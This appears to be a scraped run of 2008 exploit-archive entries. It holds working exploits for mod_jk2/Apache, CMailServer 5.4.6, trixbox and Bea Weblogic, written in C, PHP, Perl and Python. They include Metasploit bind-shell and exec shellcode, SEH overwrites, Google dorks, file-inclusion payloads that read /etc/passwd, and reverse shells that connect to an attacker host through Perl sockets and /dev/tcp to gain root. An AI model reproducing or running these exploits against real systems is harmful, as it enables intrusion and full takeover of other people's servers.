* ----------------------------------------
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
************************************************** **********************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <ctime>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh, char * cbip, int cbport, char * url);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int get_version(char * remotehost, int port, int * itarget);
int validate_args(char * remotehost, int port, int sh, int itarget);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"mod_jk2/2.0.2 for Apache 2.0.48", 0x100115c3 },// pop,pop,ret
{NULL, 0x00000000 }
};
struct {
const char * name;
int length;
char * shellcode;
}shellcodes[]={
{"Bindshell, port 9999", 461,
/*
* windows/shell_bind_tcp - 461 bytes
* http://www.metasploit.com
* Encoder: x86/nonalpha
* EXITFUNC=seh, LPORT=9999
*/
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6c\x 8b\xd7\x3b"
"\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\x eb\xf1\xeb"
"\x71\xe8\xe2\xff\xff\xff\x11\x2e\x0f\x36\x03\x2c\x 32\x07\x27"
"\x06\x15\x30\x0f\x1a\x17\x38\x0b\x13\x2d\x2b\x15\x 28\x15\x13"
"\x13\x04\x08\x27\x13\x2b\x15\x26\x11\x13\x24\x28\x 28\x28\x28"
"\x28\x38\x28\x38\x28\x15\x13\x15\x28\x13\x0b\x24\x 11\x2a\x26"
"\x13\x24\x28\x26\x13\x32\x32\x24\x2b\x27\x27\x26\x 13\x02\x02"
"\x24\x26\x15\x11\x17\x15\x13\x18\x0e\x11\x2b\x22\x 11\x37\x39"
"\x39\x01\x13\x09\x06\x37\x24\x29\x2a\x2a\x2a\x11\x 2a\x2a\x26"
"\x2a\x13\x28\x11\x24\x17\x29\x13\x28\xfc\x7b\xeb\x 7b\xe8\xf9"
"\xff\xff\xff\x60\x8b\x7b\x24\x24\x8b\x7b\x3c\x8b\x 7c\x05\x7b"
"\x01\xef\x8b\x7b\x18\x8b\x5f\x20\x01\xeb\x7b\x8b\x 34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x7b\x07\xc1\xca\x0d\x 01\xc2\xeb"
"\xf4\x3b\x7b\x24\x28\x7b\xe5\x8b\x5f\x24\x01\xeb\x 7b\x8b\x0c"
"\x7b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x7b\x24\x 1c\x7b\xc3"
"\x31\xdb\x7b\x8b\x7b\x30\x8b\x40\x0c\x8b\x7b\x1c\x ad\x8b\x40"
"\x08\x5e\x7b\x8e\x7b\x0e\xec\x7b\xff\xd6\x7b\x7b\x 7b\x7b\x33"
"\x32\x7b\x7b\x7b\x32\x5f\x7b\xff\xd0\x7b\xcb\xed\x fc\x3b\x7b"
"\xff\xd6\x5f\x89\xe5\x7b\x81\xed\x08\x02\x7b\x7b\x 02\xff\xd0"
"\x7b\xd9\x09\xf5\xad\x7b\xff\xd6\x7b\x7b\x7b\x7b\x 7b\x7b\x7b"
"\x7b\x7b\xff\xd0\x7b\x7b\x27\x0f\x7b\x7b\x89\xe1\x 95\x7b\xa4"
"\x1a\x7b\xc7\x7b\xff\xd6\x7b\x10\x7b\x7b\xff\xd0\x 7b\xa4\xad"
"\x2e\xe9\x7b\xff\xd6\x7b\x7b\xff\xd0\x7b\xe5\x7b\x 86\x7b\x7b"
"\xff\xd6\x7b\x7b\x7b\x7b\xff\xd0\x93\x7b\xe7\x7b\x c6\x7b\x7b"
"\xff\xd6\x7b\xff\xd0\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x 89\xe5\x7b"
"\x7b\x7b\x29\xcc\x89\xe7\x7b\x7b\x89\xe2\x31\xc0\x f3\xaa\xfe"
"\x7b\x2d\xfe\x7b\x2c\x93\x8d\x7b\x38\xab\xab\xab\x 7b\x7b\xfe"
"\xb3\x16\xff\x7b\x7b\xff\xd6\x5b\x7b\x7b\x7b\x7b\x 7b\x7b\x01"
"\x7b\x7b\x7b\x7b\xff\xd0\x7b\xad\xd9\x05\xce\x7b\x ff\xd6\x7b"
"\xff\xff\x37\xff\xd0\x8b\x7b\xfc\x83\xc4\x7b\xff\x d6\x7b\xff"
"\xd0\x7b\xf0\x8a\x04\x5f\x7b\xff\xd6\xff\xd0"
},
{NULL , NULL }
};
int main(int argc, char **argv)
{
char * remotehost=NULL;
char default_remotehost[]="127.0.0.1";
char temp1[100], temp2[100];
int port, itarget, x, sh;
SOCKET s;
char c;
int option_index=0;
logo();
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
if(argc<2)
{
usage(argv[0]);
return -1;
}
// set defaults
port=80;
itarget=-1;
sh=0;
// ------------
while((c = getopt(argc, argv, "h:p:"))!= EOF)
{
switch (c)
{
case 'h':
remotehost=optarg;
break;
case 'p':
sscanf(optarg, "%d", &port);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
if(remotehost == NULL) remotehost=default_remotehost;
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
printf(" # Host : %s%s# \n", remotehost, temp1);
sprintf(temp2, "%d", port);
memset(temp1,0,sizeof(temp1));
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Port : %s%s# \n", temp2, temp1);
memset(temp1,0,sizeof(temp1));
memset(temp2,0,sizeof(temp2));
sprintf(temp2, "%s", shellcodes[sh].name );
memset(temp1, '\x20' , 58 - strlen(temp2) -1);
printf(" # Payload : %s%s# \n", temp2, temp1);
printf(" # ------------------------------------------------------------------- # \n");
fflush(stdout);
printf(" [+] Checking if server is online\n");
fflush(stdout);
s=do_connect(remotehost, port);
if(s==-1)
{
printf(" [-] Server is OFFLINE\n");
end_logo();
return 0;
}
closesocket(s);
printf(" [+] Server is ONLINE\n");
x = get_version(remotehost, port, &itarget);
if(x<0)
{
printf(" [-] Cannot exploit due to errors\n");
WSACleanup();
end_logo();
return -1;
}
unsigned char buf[10000];
unsigned int len;
memset(buf,0,sizeof(buf));
fflush(stdout);
make_buffer(buf, &len, itarget, sh);
printf(" [+] Attacking buffer constructed\n");
if(send_buffer(buf, len, remotehost,port)==-1)
{
printf(" [-] Cannot exploit server %s\n", remotehost);
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sent\n");
printf(" [+] Connect to %s:%d\n", remotehost, 9999);
end_logo();
WSACleanup();
return 0;
}
SOCKET do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
SOCKET s;
host = gethostbyname(remotehost);
if (!host)
{
perror(" [-] gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
closesocket(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
closesocket(s);
return -1;
}
return s;
}
int get_version(char * remotehost, int port, int * target)
{
char bufmax[4096], * lp, *lp2, WebBanner[1000], Version[1000], ModJK[1000];
int bytes,j,x;
SOCKET sock;
memset(bufmax,0,sizeof(bufmax));
memset(WebBanner,0,sizeof(WebBanner));
memset(Version,0,sizeof(Version));
memset(ModJK,0,sizeof(ModJK));
sock = do_connect(remotehost, port);
if (sock == -1) return -1;
send(sock, "GET /a.html HTTP/1.0\r\n\r\n",(int)strlen("GET /a.html HTTP/1.0\r\n\r\n"),0);
if ((bytes = recv(sock, bufmax, sizeof(bufmax),0 )) <= 0) return -1;
bufmax[sizeof(bufmax)-1]=0;
if((lp=strstr(bufmax,"Server:"))==NULL) return -1;
if((lp2=strstr(lp,"\r\n"))==NULL) return -1;
strncpy(WebBanner, lp, lp2-lp);
if((lp=strstr(WebBanner,"Win32"))==NULL)
{
printf(" [-] OS is not a Win32\n");
return -1;
}
if((lp=strstr(WebBanner,"Apache/"))==NULL)
{
printf(" [-] No Apache\n");
return -1;
}
if(lp+strlen("Apache/")>WebBanner+strlen(WebBanner)-1) return -1;
lp+=strlen("Apache/");
if((lp2=strstr(lp," "))==NULL) return -1;
strncpy(Version, lp, lp2-lp);
printf(" [+] Version of Apache is %s\n", Version);
x=0;
for(j=0; targets[j].t!=0;j++)
{
if(strstr(targets[j].t,Version)!=NULL)
{
x=1;
break;
}
}
if(x==0)
{
printf(" [-] This version of Apache is UNSUPPORTED\n");
return -1;
}
printf(" [+] This version of Apache is SUPPORTED\n");
strncpy(WebBanner, lp, lp2-lp);
if((lp=strstr(WebBanner,"mod_jk2/"))==NULL)
{
printf(" [-] No mod_jk2\n");
return -1;
}
if((lp2=strstr(lp," "))==NULL) lp2=WebBanner+strlen(WebBanner);
strncpy(ModJK, lp, lp2-lp);
printf(" [+] mod_jk2 is %s\n", ModJK);
x=0;
for(j=0; targets[j].t!=0;j++)
{
if(strstr(targets[j].t,ModJK)!=NULL)
{
*target=j;
x=1;
break;
}
}
if(x==0)
{
printf(" [-] This version of mod_jk2 is UNSUPPORTED\n");
return -1;
}
printf(" [+] This version of mod_jk2 is SUPPORTED\n");
return 0;
}
void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
{
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
*fshlength = shellcodes[sh].length;
}
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{
// prepare shellcode
unsigned char fsh[10000];
unsigned int fshlength;
memset(fsh, 0, sizeof(fsh));
prepare_shellcode(fsh, &fshlength, sh);
// -----------------
// make buffer
unsigned char * cp=buf;
// begin of the HTTP request
memcpy(cp, "GET / HTTP/1.0\r\nHost: ", strlen("GET / HTTP/1.0\r\nHost: ") );
cp+=strlen((char *)cp);
// jff
*cp++='\x90';
*cp++='\x90';
*cp++='\x90';
*cp++='\x90';
// overflowing
memset(cp, '\x41', 5001);
// put the shellcode
memcpy(cp, fsh, fshlength);
cp+=1271;
// calculating backward jump
int jmp_bytes=0xffffffff - (1275);
// putting backward jump
*cp++ = '\xe9';
*cp++ = (char)((jmp_bytes ) & 0xff);
*cp++ = (char)((jmp_bytes >> 8) & 0xff);
*cp++ = (char)((jmp_bytes >> 16) & 0xff);
*cp++ = (char)((jmp_bytes >> 24) & 0xff);
// next SEH record and back jump
*cp++='\x90';
*cp++='\x90';
*cp++='\xeb';
*cp++='\xf7';
// replace SEH
*cp++ = (char)((targets[itarget].ret ) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
// trigger exception
cp+=3000;
// copy the last part of the request
memcpy(cp, "\r\n\r\n", strlen("\r\n\r\n") );
cp+=strlen((char *)cp);
}
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port)
{
SOCKET sock;
sock = do_connect(remotehost, port);
if (sock<0) return -1;
if (send(sock, (char *)buf,(int)strlen((char *)buf),0)<=0) return -1;
closesocket(sock);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '\0')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '\0')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
void usage(char * s)
{
printf("\n");
printf(" Usage: %s -h <host> -p <port>\n", s);
printf(" -------------------------------------------------------------------\n");
printf(" Arguments:\n");
printf(" -h ........ host to attack\n");
printf(" -p ........ port to use\n");
printf("\n");
printf(" Supported mod_jk versions:\n");
for(int j=0; targets[j].t!=0;j++)
{
printf(" %d. %s\n",j+1, targets[j].t);
}
printf("\n");
printf(" Execution: %s\n\n", shellcodes[0].name);
end_logo();
}
void logo()
{
printf("\n\n");
printf(" ################################################## ##################### \n");
printf(" # ____ __ _ ______ __ _____ #\n");
printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
printf(" # crew #\n");
printf(" ################################################## ##################### \n");
printf(" # Exploit : mod_jk2 v2.0.2 for Apache 2.0 # \n");
printf(" # Author : Heretic2 # \n");
printf(" # THANKS : IOActive and The Metasploit Project # \n");
printf(" # Research: IOActive Security Advisory # \n");
printf(" # Version : 1.0 # \n");
printf(" # System : Windows ALL # \n");
printf(" # Date : 01.03.2008 - 02.03.2008 # \n");
printf(" # ------------------------------------------------------------------- # \n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # \n");
printf(" # Dreatica-FXP crew [Heretic2] # \n");
printf(" ################################################## ##################### \n\n");
}
// [2008-03-31]
80 Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.enigmagroup.org/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2([email protected])'s exploit (Win32):
** http://www.enigmagroup.org/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
** Fedora Core release 6 (exec-shield) based
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
** by INetCop Security
**
** + make socket
** + make exploit payload
** + try connected 61.42.25.22:80
** + exploit send!
** * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: --
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/
http://enigmagroup.org/sploits/2008-x2_fc6f7f8.tar.gz
# [2008-04-06]
80 CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit
<?php
/*
CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite
proof of concept exploit
by Nine:Situations:Group::bruiser
our site: http://retrogod.altervista.org/
software site: http://www.youngzsoft.net/cmailserver/
Google dorks:
intitle:"Mail Server CMailServer WebMail"
intitle:"Mail Server CMailServer WebMail 5.4.6"
Some notes:
This server provides a IIS/webmail interface and a registered component
vulnerable to multiple buffer overflows, among the others, the
CMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.
This class is called by various ASP scripts inside the main folder...
I found this clear vector, look mwmail.asp , lines 25-35:
...
Set objPOP3 = CreateObject("CMailCOM.POP3.1")
objPOP3.Login Session("User"), Session("Pass")
Session("LoginSuccess") = objPOP3.LoginSuccess
If Session("LoginSuccess") = 1 Then
set rs=Server.createobject("adodb.recordset")
rs.open "mailfolder",Conn,1,3
i = 0
arrString = Split(Request("indexOfMail"), ";", -1, 1)
While Len(arrString(i)) <> 0
strUID = arrString(i)
objPOP3.MoveToFolder strUID ' <---------------- bof
...
By attaching olly to the w3wp.exe sub-process you will see the usual
dump with ecx and eip owned, with a buffer of approxymately 13000 chars.
Exploitation is post-auth but you can have a user account by simply
browsing the signup.asp page, enabled by default.
Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note
that 4-5 failed exploit attempts may result in IIS "Service
Unavailiable" message.
Other attacks are possible, see a list of locally overflowable
methods:
CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,
DeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.
Note also that remotely there's some kind of validation (ex. you can
not have a username with a length of more than 4000 chars which
could be used instead to overflow the CreateUserPath method and
you cannot overflow ex. through the strUID argument) which reduces a lot
the remote vectors. However, as you can see there's no filter on
"indexOfMail" one.
Other notes:
CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0
is also vulnerable in the following methods:
AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,
SetTo, SetFromUID
*/
error_reporting(7);$host=$argv[1];$path=$argv[2];
$argv[3] ? $port = (int) $argv[3] : $port = 80;
print ("CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n".
"exploit\n".
"by Nine:Situations:Group::bookoo\n");
$argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]\n".
"example: php ".$argv[0]." 192.168.0.1 /mail/ \n".
" '' php ".$argv[0]." 192.168.0.1 / 81 \n");
$url = "http://$host:$port";
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("php_curl.so");
//borrowed from bookoo
function send($packet,$out) {
global $url, $data;
if (!extension_loaded("curl"){
die("you need the curl extesion loaded to run...");
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);
$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."\n";
} else {
curl_close($ch);
}
if ($out) print($data."\n");
}
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
//subscribe
$usr="bookoo";$pwd="password";//new usr username & password, change
$d ="Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com";
$h ="POST ".$path."signup.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nConnection: Close\r\n\r\n$d";
send($h,0);
$tmp=explode("Set-Cookie: ",$data);
for ($i=1; $i<count($tmp);$i++){ $tmpi=explode(" ",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, "ASPSESSIONID"); if ($pos === true) break; echo $sess."\n";}
//login
$d ="User=$usr&Pass=$pwd&SaveUserPass=on";
$h ="POST ".$path."login.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h,0);
//attack
//bad chars: \x3b \x2f
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
$shellcode =
"\x2b\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\xcf".
"\x67\x5f\x11\x83\xee\xfc\xe2\xf4\x33\x8f\x1b\x11\x cf\x67\xd4\x54".
"\xf3\xec\x23\x14\xb7\x66\xb0\x9a\x80\x7f\xd4\x4e\x ef\x66\xb4\x58".
"\x44\x53\xd4\x10\x21\x56\x9f\x88\x63\xe3\x9f\x65\x c8\xa6\x95\x1c".
"\xce\xa5\xb4\xe5\xf4\x33\x7b\x15\xba\x82\xd4\x4e\x eb\x66\xb4\x77".
"\x44\x6b\x14\x9a\x90\x7b\x5e\xfa\x44\x7b\xd4\x10\x 24\xee\x03\x35".
"\xcb\xa4\x6e\xd1\xab\xec\x1f\x21\x4a\xa7\x27\x1d\x 44\x27\x53\x9a".
"\xbf\x7b\xf2\x9a\xa7\x6f\xb4\x18\x44\xe7\xef\x11\x cf\x67\xd4\x79".
"\xf3\x38\x6e\xe7\xaf\x31\xd6\xe9\x4c\xa7\x24\x41\x a7\x97\xd5\x15".
"\x90\x0f\xc7\xef\x45\x69\x08\xee\x28\x04\x3e\x7d\x ac\x67\x5f\x11";
$jmp_short="\xeb\x10\x90\x90";
$seh="\xf1\xda\x02\x10"; #0x1002DAF1 cmailcom.dll / pop ecx - pop - ret
$nop=str_repeat("\x90",12648);
$bof= $nop . $jmp_short. $seh . str_repeat("\x90",24). $shellcode ;
$d="sel=aaaa&ToFolder=4&indexOfMail=".urlencode($bof)."&mailcount=1&pages=";
$h ="POST ".$path."mvmail.asp HTTP/1.0\r\nHost: $host\r\nUser-Agent: $agent\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($d)."\r\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\r\nConnection: Close\r\n\r\n$d";
send($h,1);
?>
# [2008-07-06]
80 trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2
#!/usr/bin/perl -w
# Jean-Michel BESNARD <[email protected]> / LEXSI Audit
# 2008-07-09
# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.
#
# perl trixbox_fi_v2.pl 192.168.1.212
# Please listen carefully as our menu option has changed
# Choose from the following options:
# 1> Remote TCP shell
# 2> Read local file
# 1
# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444
# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]
# root
# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)
# Press enter to continue...
# done...
# nc -l -v -p 4444
# listening on [any] 4444 ...
# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397
# bash: no job control in this shell
# bash-3.1# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
# bash-3.1#
use strict;
use Switch;
use LWP::UserAgent;
use HTTP::Cookies;
usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);
menu();
sub execScript{
my $scriptCode = shift;
post($scriptCode);
my $phpsessionid = extractPHPSID($cookie_jar->as_string);
post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}
sub post{
my $postData = shift;
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content($postData);
my $res = $ua->request($req);
my $content = $res->content;
return $content;
}
sub readFile{
my $file = shift;
my $content = post("langChoice=../../../../../../../../../..$file%00");
my @fileLines = split(/\n/,$content);
my $fileContent = "Content of $file: \n\n";
for(my $i=3;$i<@fileLines;$i++){
last if($fileLines[$i] =~ m/trixbox - User Mode/);
$fileContent = $fileContent . $fileLines[$i-3] . "\n";
}
return $fileContent;
}
sub tcp_reverse_shell{
my $rhost= shift;
my $rport = shift;
my $uid = shift;
my $rshell;
if($uid eq "asterisk"){
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec({\"/bin/sh\"} (\"JMB\", \"-i\"));'`;?>%00";
}else{
$rshell = "langChoice=<?php `/usr/bin/perl -MSocket -e '\\\$p=fork;exit,if(\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\"$rhost\")));open(STDIN, \">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/usr/bin/sudo\",\"/bin/bash\", (\"-i\"));'`;?>%00";
}
execScript($rshell);
}
sub extractPHPSID{
$_ = shift;
if(/PHPSESSID=(\w+)/){
return $1;
}
}
sub menu{
print <<EOF;
Please listen carefully as our menu option has changed
Choose from the following options:
1> Remote TCP shell
2> Read local file
EOF
my $option = <STDIN>;
chop($option);
switch($option){
case 1 {
print "Host and port the reverse shell should connect to ? ";
print "(<host>:<port>): ";
my $hp=<STDIN>;
chop($hp);
print "Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]";
my $uid=<STDIN>;
chop($uid);
my($rhost,$rport) = split(/:/,$hp);
print "Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\n";
print "Press enter to continue...";
<STDIN>;
tcp_reverse_shell($rhost,$rport,$uid);
print "done...\n";
}
case 2 {
while(1){
print "Full path (e.g. /etc/passwd): ";
my $file = <STDIN>;
chop($file);
print readFile($file) . "\n\n";
}
}
}
}
sub usage{
print "./trixbox_fi.pl <host>\n";
exit 1;
}
# [2008-07-09 ]
80 trixbox 2.6.1 (langChoice) Remote Root Exploit (py)
#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# chris from offensive-security.com
# All credits to Jean-Michel BESNARD <[email protected]>
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
################################################## ################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
################################################## ################################################
import sys
from socket import *
import re
import os
from time import sleep
print (" BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
" TrixBox 2.6.1 langChoice remote root exploit \r\n"
" http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
if (len(sys.argv)!=5):
print " Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
exit(0)
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
def create_post(injection):
buffer=("POST /user/index.php HTTP/1.1 \r\n"
"Host: 192.168.219.132 \r\n"
"Content-Type: application/x-www-form-urlencoded \r\n"
"Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
return buffer
def send_post(host,port,input):
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(input)
output=s.recv(1024)
s.close()
return output
def find_sessionid(http_output):
headers=re.split("\n",http_output)
for header in headers:
if re.search("Set-Cookie",header):
cook=header.split(" ")
sessionid=cook[1][10:42]
print " Session ID is %s" % sessionid
return sessionid
print " Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
print " Extracting Session ID"
id=find_sessionid(raw_session)
print " Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print " Skadush! \r\n Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
print " Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print " Done!"
# [2008-07-12]
80 Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day
#// Should stack break latest Windows Server 2003 <address space randomization>
#// BIG THANKS TO
#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
#// His technique works fine against Windows 2003 latest version.
#//
#// The code is broken, since I am chilling out for now
#// SKIDDI BULLETPROOF
#// You may fixup the DoS Code, Windows Code Works on English OSs
#// KingCope -- July/2008
use IO::Socket;
use strict;
$|=1;
my $apacheport = 80; #// Touch
###
my $wrongusage = 0;
my $dodoshost = 0;
################################################## #############################
### Target List Entries |Operating System and Patch Level / Kernel Version|
################################################## #############################
my @targets = ();
my @tgtname = ();
print "-" x 80;
$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
$tgtname[0] = $targets[0];
$targets[100] = "2 Denial of Service\n";
$tgtname[100] = $targets[100];
################################################## #############################
### Print Of Target List And Usage
################################################## #############################
print "\n";
print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
print "Target List:\n";
foreach my $target (@targets) {
print $target;
}
print "\n\n";
print "-" x 80;
